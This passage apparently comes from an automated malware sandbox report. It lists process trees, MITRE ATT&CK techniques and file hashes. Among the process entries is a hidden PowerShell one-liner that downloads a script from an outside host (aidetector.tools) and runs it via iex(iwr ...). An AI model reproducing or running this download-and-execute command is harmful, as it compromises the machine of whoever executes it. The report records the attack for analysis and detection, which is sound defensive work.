  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6352,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6668,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5724,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:5608

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:2768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min powershell -w h "$u='https://aidetector.tools/wZWZqs';[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;iex(iwr $u -UseBasicParsing -UserAgent 'ID: daff2f8').Content;
1⤵
PID:5348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w h "$u='https://aidetector.tools/wZWZqs';[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;iex(iwr $u -UseBasicParsing -UserAgent 'ID: daff2f8').Content;
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2884

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1130248396\manifest.fingerprint

Filesize
66B

MD5
496b05677135db1c74d82f948538c21c

SHA1
e736e675ca5195b5fc16e59fb7de582437fb9f9a

SHA256
df55a9464ee22a0f860c0f3b4a75ec62471d37b4d8cb7a0e460eef98cb83ebe7

SHA512
8bd1b683e24a8c8c03b0bc041288296448f799a6f431bacbd62cb33e621672991141c7151d9424ad60ab65a7a6a30298243b8b71d281f9e99b8abb79fe16bd3c

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1130248396\manifest.json

Filesize
134B

MD5
049c307f30407da557545d34db8ced16

SHA1
f10b86ebfe8d30d0dc36210939ca7fa7a819d494

SHA256
c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54

SHA512
14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\manifest.json

Filesize
135B

MD5
4055ba4ebd5546fb6306d6a3151a236a

SHA1
609a989f14f8ee9ed9bffbd6ddba3214fd0d0109

SHA256
cb929ae2d466e597ecc4f588ba22faf68f7cfc204b3986819c85ac608d6f82b5

SHA512
58d39f7ae0dafd067c6dba34c686506c1718112ad5af8a255eb9a7d6ec0edca318b557565f5914c5140eb9d1b6e2ffbb08c9d596f43e7a79fdb4ef95457bf29a

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping2724_172039380\LICENSE

Filesize
1KB

MD5
ee002cb9e51bb8dfa89640a406a1090a

SHA1
49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2

SHA256
3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b

SHA512
d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping2724_172039380\manifest.json

Filesize
79B

MD5
7f4b594a35d631af0e37fea02df71e72

SHA1
f7bc71621ea0c176ca1ab0a3c9fe52dbca116f57

SHA256
530882d7f535ae57a4906ca735b119c9e36480cbb780c7e8ad37c9c8fdf3d9b1

SHA512
bf3f92f5023f0fbad88526d919252a98db6d167e9ca3e15b94f7d71ded38a2cfb0409f57ef24708284ddd965bda2d3207cd99c008b1c9c8c93705fd66ac86360

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1767817152\manifest.json

Filesize
85B

MD5
c3419069a1c30140b77045aba38f12cf

SHA1
11920f0c1e55cadc7d2893d1eebb268b3459762a

SHA256
db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f

SHA512
c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

Filesize
3KB

MD5
f9fd82b572ef4ce41a3d1075acc52d22

SHA1
fdded5eef95391be440cc15f84ded0480c0141e3

SHA256
5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

SHA512
17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
60d40d2b37759323c10800b75df359b8

SHA1
f5890e7d8fc1976fe036fea293832d2e9968c05c

SHA256
c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0

SHA512
0c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
f4129d2dc9e99bea8c3bace297c084fd

SHA1
43c19e7edfb0b6a754a41754bba48e2004f5e063

SHA256
58d5c82296fa973a98467f88028a839e0f7b6fd2952cf2c012633341e2c02a22

SHA512
b1620973703b4e5849a2075eabecd892b468ac9f34a3ded80b505c2484a4dc2841974829d623fe30de683138591d01600d037aae12c0822f698c31e9ac49e280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57dc18.TMP

Filesize
3KB

MD5
c3f9682a4a396fbe5e020fbe6917bfdb

SHA1
f1e63e5b59055b26f0b9f547f7ca27f6d1576aea

SHA256
ae34eb41620f9d5242f57e4c54c5bd244fbeb3a7024c7cf1ce7b8939cb23c5cc

SHA512
c84f535b15ff7290ddf34c42c2f8a4b0d1a46253b899f66c06d16721931f89df844f2fc75deb44ece6c832d6b320902fd9dc6451f51170d5ef034e0d83222852

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
bc628b548c0fcae481e48ff2f3fc2f0a

SHA1
c7473b1fede571e73e9d37f7d46c61e9363dd805

SHA256
ed0dd9003f9579ff1260a837643d206bdfb4bbe452ae498f093ef607c19ef878

SHA512
83b1e3ea5815a746b1941e594c10e2fbe8c1f20b9ecea35c6bdf5f7c9bfe02214f38a53201656ea88a877ff753282206a8b691c8bb4b882a9cce87bcb2485fa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
bbb9284d98e2cc85a51e1ad23a37445a

SHA1
d9b8e995817fdb723d3ccf8dc4ca059945f76064

SHA256
e2f7dacb10448c11ee7d9783432806f923d80a3c0cdfebc28b437078926f47c3

SHA512
44ffdcadbad335ea89a375946ae266f5af8770e28de00a8709303a00bea6766118f3e74b2dbe980236d24a6d4b9ae442d7188aed39bdc8eb04d38569eccd7c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
c20a1ea3f1756f2ed542c50788a9d965

SHA1
91f86bb7e1f01f3f053016c38995f370bdafe632

SHA256
44179c73d6eb4053998eccc90ce5eac8dfaf88153e1ad9d8ccaa0f2b1b580dca

SHA512
392f1b1ae680c61b1e4e862945df07d1cc76ff1fd318570867ed87d5ea2d6c9494610c3319ddcad2e1b06751fb3a303240966ca2520d9c4bafa9468d79476f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
c2ec962b1b6da41e49558804a06db830

SHA1
3814b81680884510595ff71d397453181a45c984

SHA256
8feb5e693ab9c6e4d4315567937f7b4029b508b9fa70673f1283a88e0de196ce

SHA512
8c8eb6825cc8650f78f3c138f0e1f1ff08331d8947cfc89a49a8b66cdf2b859baa725149592cb5a02166d3c5e9e58d721e47bb6538991117e3851ef3423d924e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
50f847c36df1df5aad72492960869f4a

SHA1
3743ceb2067abe94133503354d7e8f4daedbb131

SHA256
3f7b230b62faa4cb21acf0a56bb2704f30087f7a16790337b6e2c9f295c8c08e

SHA512
ad118cc6ae79528daa7e6e13c1e3aca6e39c16dbb8f128d59ec3017f51d3c95d32198e6168d458f695bd0beee104b6436c23c7a71eb318a9ba2ed827991524fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\29f85a0f-dc0b-4e44-8168-a2e8a0b9fd66\04192d36108742f3_0

Filesize
4KB

MD5
ae96eb84292fdab549c7fd505f79ea4f

SHA1
32f84ad843732d07692e9592793d0fc2f2c352ba

SHA256
c21139761e4e8e83f36c2b0168408e1ff1d17cddd24049d1ddbcb8ea327ac6b4

SHA512
7226c3c628495155da1b7767a8f76ece3c195aab84ab4c7bb1b60f1e5fb17a7256e32d7ac78fc50b5bb0c448fe7c96d1b714373ba2ff7b92438053d713db81e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\29f85a0f-dc0b-4e44-8168-a2e8a0b9fd66\index-dir\the-real-index

Filesize
96B

MD5
55f5ccfd0840abea92e337c4b5ef5e7f

SHA1
6c247e4b176ea450d723d760ad8201650ec62aed

SHA256
9bc9328bd22022f0abd666eb191d615e4f835ceb3c9eb47112d27e6c468be6dd

SHA512
0b347806abfb769ebbafdb5936d0959c7557f1416ff97151bb7b4f509dfefae4c0324c6b667b7d7e130b9afa96c00ba3e9d584f77a3ee8f9948b55f7ffd49dad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\42ddc8bb-293f-4ab5-9548-74560e3a2905\index-dir\temp-index

Filesize
48B

MD5
8a327340112c8e48e00f51f9fdfbf80f

SHA1
34eea724c036a6b10568473961a4c6deb7398b2e

SHA256
81e1a3162d18fefb288ead6f472ca7333c77962bf19da5741672e6ce1f256af3

SHA512
a5578dc93fa8f08d28fa055f686998f08c757069d17a755cd2041f7932d9f3da147c768b745271443ed4675fa3cf1360dc04cdfb95f49d67cafed1d96a2e0f56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\42ddc8bb-293f-4ab5-9548-74560e3a2905\index-dir\the-real-index

Filesize
72B

MD5
31f48d01a9ac17b39d3db6c6fed6d220

SHA1
c0f09e2496a330274a53ec3a49b705c5f14177d3

SHA256
813b73d47bb692d1920d42867d0ee1cc6a4a9568ef7684a6823f65a0dd66530d

SHA512
d81a55da6d87d3c47d126d78a33f728dbccce054d9c81eecfc82ca1e987a7e55acc38108f14cea5fbfe5a4b772abd5e194d98d120851e82056364fdc29ccb7a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\cd829437-7b76-42ac-aadf-842eb7cfa634\index-dir\the-real-index

Filesize
72B

MD5
d926f864a6a1b9d9513bc0dabe6db857

SHA1
29880c7ea97b18a722ccd684e2d98df8fa71be87

SHA256
b3deb7ae7fc7985c5a73df6e437f2caabe4771da48a2be43c46c5437218f2d47

SHA512
bf32a0be07fd6e1d5855cf6d90ad40d0e23a5d5880067198b1e421a175e6d40624966900bccead8d46efe46bc43099e313c8fef09f7e40d7abb79f8084b1a85f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\index.txt

Filesize
262B

MD5
588120ab08b1356c6063095ee8b63fab

SHA1
e5493c32afb2ad506205a39d009ec2ed86c24c5c

SHA256
cba12272325df66a18f459393c7f12e50c006821eba7f756481c196a4818b945

SHA512
6145fb98379c4c7c83b0fb4981f3d3bde77b52aa988d8335c0510148f6b98e64896b237ce62ef61ac5137b3cf99959c47aec2fa5c833e2fc5613a188a28cb84e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\index.txt

Filesize
203B

MD5
86367129743bf89a8f4ac5bac68200e9

SHA1
5f73b101fbcd053d43960289439a82611e452dba

SHA256
552d99173d732d2dd03b43b1ea2026444d66d1fa3f3eb262e181c1b3840ab2c5

SHA512
e5c57b28ce0a10a77d859d5e9dcff96630ca6b7bd0d370bcc0bb589d69888011b5c1004d8588c1e8bfdd39d761802029e2d5a77d5e3a0b8594b1989667cc993b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\index.txt

Filesize
264B

MD5
3971ab7823525511f19ea7c0bfebbceb

SHA1
705572b41b4061b36e1aa47408aaab2610f8ed11

SHA256
9ead7a75a5d72d5b15128134014ed33aecc882278b42a824a4b20bc5365feac2

SHA512
fafcac5908bd38d1d67088fada4070c25501d9c90bd8745f5f1b613f44ff93f33dfc3fa2002103b72fa9c95e3beb0108f878f6e59dd822a4e236d3a1a7db6f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\184e8a20286fe876b972f5ce68b1c7e39569fd71\index.txt~RFe5785e9.TMP

Filesize
138B

MD5
8bdea6293ebf05862dc0632bc7d1b362

SHA1
e5fece9fb5290c8d215e199bee865484ab8c40c0

SHA256
e2aa529a688c51b432a6dae33a747f35266e03ae2d663e9f5bfe891fa1fb5bc4

SHA512
54e3c1ed4f5b4d974a43a83716bc8afe5a6b86a52cd658805a26046352e796a08f197df1336d13ddad931376c362cd6fc241a9d07c0995b7bd05bf4bd7847b89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
caaa897df44d97571a6e32d936123cbf

SHA1
a9d53323781cf30e10b7c4511cb78e136875332b

SHA256
6a135d5d69b46019c3ff2081e28c550e3ec119e1c0c03b59b172bab160c2679e

SHA512
77bfa07811bbfda3642b5982a8a18ab75ede3563f49fd37f038a2d39c1aa6a5913dbd20a4831e0ac21668a01f103b854c9a5b2a8db2922baf73a2a56cd229c2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d419.TMP

Filesize
48B

MD5
79c88e072fbf16283def3e326f3d5b4b

SHA1
d86c92b74de0369a7e5cae296f73030ebc06415a

SHA256
9bebd826a9ef963a37e9c0bcc9a882858b41ffa657262194c28d3751b455999d

SHA512
492222010d5d6ef15538760b1eea1af1586c53f475e090a962030a8027f77c8fafdcd2f982dcb4d51562b567e2fbab39f5c5ec466ca1fc6bb1b0d7b3f49e92e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
bea00f3938815a45b0c7ca8b0676f7ef

SHA1
e6cee6c5e48543244ccca3ea7e6defcc05a0d598

SHA256
6696affe84a93fc4e07494f0ba924832a163e6ba77540d9e606ccda03fe52735

SHA512
b7ca66289366da44d8132b44197d2e9e10cfa09191a019f4b8088c6ee9efe4fa88a33fac8b8825bbe5b3758b4cbe70160ddeaadbc2d50cf8372b2b6b7e20e7e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
23KB

MD5
ab5a773805a7d7a39852d632073799d1

SHA1
fe80cf85df6a73b01668177a183fb82bd48aef74

SHA256
24c6319a4038b639932df35799e36bf3ed85ce637191abea8d7f50c32ecb8878

SHA512
456f7dec6b50ea13098d3f44ba85ae24fea8088b661f47fb6d4da3d46136d6c63e0916886184ca2b20ef3f0754dbfa592c7c1978e92a919753c03af34c932eea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
467B

MD5
ad922062a90862cf5605a63115fab8e0

SHA1
fcc3cc5f66cbef53c7a3206d6eb8bd4c7aff5cf0

SHA256
355ceffc7ee9565cc6ae210c82cf47e6e2ecc8195963ccb3389bcdb8137edf82

SHA512
9a37050e88c666a02c5597f329f346d62a6cccacc638f47a798f343c25d74931f2fb48371da49d633938c19147b1134bd82ca7d59e21aaf1845f6aa6c5c49809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
900B

MD5
3a27fd8f835fc199f9e937ef3bc82673

SHA1
ebc7f3268692cf4abfd4324b3300c348510401cd

SHA256
70231121e0e8685c320c3c8fcd61050727b0535582633dc59423bf0bd8865894

SHA512
8c24b15fe49ad99162e73b8e8eb1f3a068057bb6afecc20f7468c3cce8952b437d2c406d5439e018f27d16cfc203817b210e32d76165c5e6248d8aa8c6a571a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
19KB

MD5
41c1930548d8b99ff1dbb64ba7fecb3d

SHA1
d8acfeaf7c74e2b289be37687f886f50c01d4f2f

SHA256
16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

SHA512
a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
54KB

MD5
50782a37101394edafb3bcdaf758c61d

SHA1
756ac766e9dd755da32d818edc7e88cbaa6729cc

SHA256
947b65bdf1427c6bdfa781db549d613c8efa7e247bace1d5b0563079c0feae1f

SHA512
61260812619866fa9e0b22345096933d02c26b826a6eb5b37739506322a83b48f14e9b939f2d39a6dd505c18bcbae78065d56fe3351b68693bf7bff42e3a622e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
53KB

MD5
c749977aa166fe22c53741731461accd

SHA1
44e7bb0c19bb83860e07909adb3245d40dd369da

SHA256
4c93b515ff36baccc4067e9953630bc9abed37f1fbee6310261a685c6814caad

SHA512
4eea606ee2f6f2d8b904c1442a5b1d683e30845349aec22f5a8b48f3629e5a86482296772900910b562d2f7f8a7f117d18b7925747b948d07dc00f3ec2210390

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
39KB

MD5
93d850e80977e1ab5969634d04e41ab1

SHA1
37eedf80a59037760c42b9308d0fb4ec1f63a0fa

SHA256
bf1efa78ab656a0040f5a38c8a104d168dc4d99afe7c2c6b58f91ca1dbe85334

SHA512
d9459af7ec51292777f0436bff21f27a2bd1f53c6deb38faf1121936b4350510294258a33882c3a7547cb92ed444bfcbace2a8f909415fada5b834427f8ec669

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
d357ce63ca2cc482c59ef07e2c5f2df5

SHA1
0dd761752d8f011125c6a58ed8cebc0cc66c23f8

SHA256
e0d62d1effc203226b6260331853c7134980d0df2fedf64e90611bbc1cc23df6

SHA512
850719e8a55585d0d004efa145fc84ecc407b65a9e3d618faed3f77446bdab88258f93e5c3504939b1047c889b04524f64d7059e40785e19060182e1c5255b11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
39KB

MD5
b5b3297755fe60cce96836d5c0157c97

SHA1
d9340ff934d56417845a8c12055bbe091197b87b

SHA256
f3482729772ec9c1b8db3a19aea604a8acb1aa57b73f63410aa9d65fbbb701cc

SHA512
052f63942a12f6853736cde115501921cc247e7a25b86067b7dbfc99ffed0e375879473c75c6189b36dd29e53797a8e7ffebad70b26c29274af35bb6ac01f892

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2025.1.17.1\keys.json

Filesize
6KB

MD5
bef4f9f856321c6dccb47a61f605e823

SHA1
8e60af5b17ed70db0505d7e1647a8bc9f7612939

SHA256
fd1847df25032c4eef34e045ba0333f9bd3cb38c14344f1c01b48f61f0cfd5c5

SHA512
bdec3e243a6f39bfea4130c85b162ea00a4974c6057cd06a05348ac54517201bbf595fcc7c22a4ab2c16212c6009f58df7445c40c82722ab4fa1c8d49d39755c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
de820d89098e571a4a219b3a851ba8e9

SHA1
ac93f38a26be7dedbbbf4ccb8668669f0c04843c

SHA256
800d2b6598ad131ffc2ee60e6385e23d9729b2e29cf30c760cd454e0d92c4c71

SHA512
f3cc493491bf7fcbeb49261b3ebe7cbcb5cb67b30fdf034d72b042bb1cc4864aaa92735b63f47803f227367268c2ae86a2dbf5c58ba7a0637cf4e0e135e53272

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5ccwnc3.g4t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2884-783-0x000001EC5FD50000-0x000001EC5FD72000-memory.dmp

Filesize
136KB

Download
memory/5108-866-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-863-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-861-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-862-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-864-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-865-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-867-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-856-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-857-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download
memory/5108-855-0x000001FF48EE0000-0x000001FF48EE1000-memory.dmp

Filesize
4KB

Download